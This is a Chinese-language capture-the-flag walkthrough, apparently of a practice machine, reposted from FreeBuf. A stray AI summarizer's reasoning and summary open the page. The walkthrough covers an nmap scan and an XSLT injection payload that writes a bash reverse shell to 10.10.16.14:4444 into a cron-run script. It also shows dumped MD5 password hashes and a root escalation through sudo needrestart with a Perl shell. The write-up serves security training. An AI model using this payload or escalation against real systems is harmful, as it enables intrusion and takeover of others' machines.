XSLT 注入利用
嗯,用户让我总结一篇文章的内容,控制在100字以内,而且不需要特定的开头。首先,我需要仔细阅读这篇文章,了解它的主要内容。 文章看起来是关于网络安全的,特别是漏洞利用和提权的过程。作者使用了nmap进行信息收集,发现了一些开放的端口,比如SSH、HTTP和HTTP-alt。接着尝试文件上传和目录扫描,最终下载了源码。 然后,作者利用XSLT注入上传了一个反弹shell的XML文件,成功获得了初始访问权限。之后,通过查看用户和数据库文件,获取了其他用户的密码,并进行了MD5解密。最后,通过写一个Perl脚本并利用sudo命令提升了权限,获得了root权限。 总结一下,这篇文章详细描述了一次漏洞利用的过程,从信息收集到提权的整个流程。用户可能需要一个简洁的摘要来快速了解内容。 </think> 文章描述了一次漏洞利用过程:通过信息收集发现目标系统运行Linux,并存在文件上传和XSLT注入漏洞。利用XSLT注入上传反弹Shell控制目标机器后,进一步获取数据库中用户密码并进行MD5解密。最后通过编写Perl脚本结合sudo命令提权获得root权限。 2025-10-27 11:8:52 Author: www.freebuf.com(查看原文) 阅读量:4 收藏

freeBuf

主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

首先信息收集

lbb@lengbingbingdeMacBook-Pro ~ % sudo nmap -O 10.10.11.92
Password:
Starting Nmap 7.98 ( https://nmap.org ) at 2025-10-27 13:09 +0800
Nmap scan report for 10.10.11.92
Host is up (0.14s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .

然后直接访问
image.png
这里使用去爆破一下试试
image.png
直接去登陆
image.png
发现存在文件上传,直接去尝试,发现并不行,再去扫一下目录
image.png
这里选择去访问 /about ,然后就可以直接进行下载源码
image.png
下载完成之后直接解压
如果直接下载可能会出现
image.png
所以直接使用命令行下载
image.png
解压就可以了
image.png
然后进行查看
image.png
image.png
这里说每分钟会执行这个路径下面的py文件,那么就上传到这里 XSLT 文件

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet
        xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:ptswarm="http://exslt.org/common"
    extension-element-prefixes="ptswarm"
    version="1.0">
<xsl:template match="/">
  <ptswarm:document href="/var/www/conversor.htb/scripts/ifconfig.py" method="text">
import os;os.system("bash -c 'bash -i >&amp; /dev/tcp/10.10.16.14/4444 0>&amp;1'")
  </ptswarm:document>
</xsl:template>
</xsl:stylesheet>

上传反弹shell,xml文件随便上传一个正常的进行转换就行,并且进行监听,等一会就会上shell了
image.png
这里查看有哪些用户

www-data@conversor:/home$ ls

ls
fismathack

这里想办法去横向到fismathack用户,前面已经给出提示,有一个数据库文件

sqlite3 users.db "SELECT username, password FROM users;"

<e3 users.db "SELECT username, password FROM users;"

fismathack|5b5c3ac3a1c897c94caad48e6c71fdec

f0und404|df282e9bee7b6fbaf72dce3f20806736

2|c81e728d9d4c2f636f067f89cc14862c

这里就拿到了密码,直接进行去md5解密就可以了
image.png
就成功拿到密码,进行横向,然后

sudo -l

就会出现会出现一个
needrestart
然后直接去写一个 Perl 脚本

echo 'system("/bin/bash");' >/tmp/kick.pl

然后再执行

sudo needrestart -c /tmp/kick.pl

就直接拿到root了,到此结束

tips:

考察 XSLT 注入
image.png

https://swisskyrepo.github.io/PayloadsAllTheThings/XSLT%20Injection/

然后简单的提权

已在FreeBuf发表 0 篇文章

本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)


文章来源: https://www.freebuf.com/articles/vuls/454388.html
如有侵权请联系:admin#unsafe.sh